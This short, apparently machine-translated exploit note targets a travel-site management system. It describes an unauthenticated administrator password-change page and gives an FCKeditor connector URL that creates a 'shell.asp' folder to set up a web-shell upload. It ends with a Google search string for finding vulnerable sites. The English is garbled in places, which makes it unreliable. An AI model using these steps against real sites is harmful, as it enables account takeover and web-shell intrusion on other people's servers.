Vulnerability program: Le tour travel site management system v1. 7. 3 Affected versions: v1. 7. 3 The exploit procedure: First: The administrator directory under Admin_Passod. asp
This file is used to modify the password. But the author is not on this file do access restrictions. So we can use it to modify the administrator password. The use method is very simple: References http://www.xxx.com/admin/Admin_Passod.asp
Second: FCK upload vulnerability, recently see a lot of programs the existence of this vulnerability.
http://www.xxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4
The official website does not exist to the first question, one is to modify the background path, the second is delete that file. In Google enter keyword: inurl:Plan_Show. asp? InfoId=